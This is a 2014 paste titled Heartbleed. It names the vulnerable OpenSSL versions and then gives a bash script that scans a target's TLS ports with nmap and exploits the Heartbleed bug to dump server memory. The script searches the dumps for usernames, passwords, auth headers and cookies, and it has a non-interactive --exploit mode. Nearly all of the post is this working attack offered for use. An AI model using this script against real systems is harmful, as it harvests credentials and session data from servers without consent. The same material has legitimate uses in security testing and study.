Heartbleed

SUBMITTED BY: Guest

DATE: May 6, 2014, 2:15 p.m.

FORMAT: Text only

SIZE: 4.6 kB

Raw Download

HITS: 2097

Report
  1. # Heartbleed
  3. #Affected OpenSSL versions
  5. #The affected versions of OpenSSL are OpenSSL 1.0.1 through 1.0.1f (inclusive).
  6. #Later versions (1.0.1g and ulterior) and previous versions (1.0.0 branch and older) are not vulnerable.
  7. #Installations of the affected versions are vulnerable unless OpenSSL was compiled with OPENSSL_NO_HEARTBEATS.
  9. # Scan and exploit
  12. # ./hbse 127.0.0.1 # Interactive mode.
  13. # ./hbse --scan 127.0.0.1 # No interactive mode. Scan only.
  14. # ./hbse --exploit 127.0.0.1 # No interactive mode. Scan and exploit.
  16. # cat hbse
  17. #!/bin/bash
  19. ### TCP ####
  21. # 443 (HTTPS - HTTP over SSL)
  22. # 465 (SMTPS - SMTP over SSL)
  23. # 563 (NNTPS - NNTP over TLS/SSL)
  24. # 636 (LDAPS - LDAP over TLS/SSL)
  25. # 989 (FTPS Data - FTP Data over TLS/SSL)
  26. # 990 (FTPS Control - FTP Control over TLS/SSL)
  27. # 992 (Telnet over TLS/SSL)
  28. # 993 (IMAPS - IMAP over SSL)
  29. # 995 (POP3S - POP3 over SSL)
  30. # 1194 (OpenVPN)
  31. # 2484 (Oracle Database listening for SSL client)
  32. # 5061 (SIP over TLS)
  33. # 8443 (Apache Tomcat SSL)
  35. ### UDP ###
  37. # 563 (NNTPS - NNTP over TLS/SSL)
  38. # 636 (LDAPS - LDAP over TLS/SSL)
  39. # 4433 (OpenSSL)
  41. if [ $# -eq 1 ]; then
  42. ip="$1"
  43. elif [ $# -eq 2 ]; then
  44. se="$1"
  45. ip="$2"
  46. else
  47. exit
  48. fi
  49. nports="T:443,465,563,636,989,990,992,993,995,1194,2484,5061,8443,U:563,636,4433"
  51. function print() {
  52. text="$1"
  53. color="$2"
  54. if [ "$color" == "gray" ]; then
  55. header="\e[38;5;250m"
  56. elif [ "$color" == "red" ]; then
  57. header="\e[91m"
  58. elif [ "$color" == "green" ]; then
  59. header="\e[92m"
  60. elif [ "$color" == "yellow" ]; then
  61. header="\e[93m"
  62. fi
  63. tail="\e[0m"
  64. echo -en $header$text$tail
  65. }
  67. print "Checking if $ip is vulnerable on port 443... " "gray"
  68. vulnerable="`nmap -p T:443 -script ssl-heartbleed $ip | grep VULNERABLE`"
  70. if [ "$vulnerable" != "" ]; then
  71. print "Yes\n" "green"
  72. print "Checking if it is vulnerable on other ports... " "gray"
  73. vports="`nmap -p $nports -script ssl-heartbleed $ip | grep -B 2 VULNERABLE: | grep open | awk -F'/' '{print $1}'`"
  74. n="`echo "$ports" | wc -l`"
  75. if [ "$n" == 1 ]; then
  76. print "No\n" "red"
  77. w1="port"
  78. w2="it"
  79. w3="file"
  80. else
  81. print "Yes\n" "green"
  82. w1="ports"
  83. w2="them"
  84. w3="files"
  85. fi
  86. print "Vulnerable $w1:\n" "gray"
  87. print "$vports\n" "green"
  88. if [ "$se" == "--scan" ]; then exit
  89. elif [ "$se" == "--exploit" ]; then
  90. answer="Y"
  91. else
  92. print "Do you want to exploit $w2? [Yn] " "gray"
  93. read answer
  94. fi
  95. if [ "$answer" = "Y" ]; then
  96. print "Exploit: dumping 64KB on vulnerable $w1...\n" "gray"
  97. exec 3<<< "$vports"
  98. while read port <&3; do
  99. print "+ Port [$port]\n" "gray"
  100. ofile="$ip.$port"
  101. if [ -f $ofile ]; then rm -f $ofile; fi
  102. if [ "$port" == "465" ]; then
  103. precmd='-c 0'
  104. elif [ "$port" == "993" ]; then
  105. precmd='-c 2'
  106. elif [ "$port" == "995" ]; then
  107. precmd='-c 1'
  108. else
  109. precmd=''
  110. fi
  111. ./heartbleed -s $ip -p $port -f $ofile $precmd -t 1 > /dev/null 2>&1
  112. if [ -f $ofile ]; then
  113. r="`strings $ofile | grep -i -e user -e pass -e login -e auth -e cookie -e basic`"
  114. print "$r\n" "green"
  115. if [ "$se" != "--exploit" ]; then
  116. print "Do you want to less the hexdump file? [Yn] " "gray"
  117. read answer
  118. if [ "$answer" = "Y" ]; then
  119. hexdump -C $ofile | less
  120. fi
  121. fi
  122. else
  123. print "Error: heartbleed did not work on port $port...\n" "yellow"
  124. fi
  125. done
  126. if [ "$se" != "--exploit" ]; then
  127. print "Do you want to delete the hexdump $w3? [Yn] " "gray"
  128. read answer
  129. if [ "$answer" = "Y" ]; then
  130. rm -f $ip.*
  131. fi
  132. fi
  133. fi
  134. else
  135. print "No\n" "red"
  136. fi
comments powered by Disqus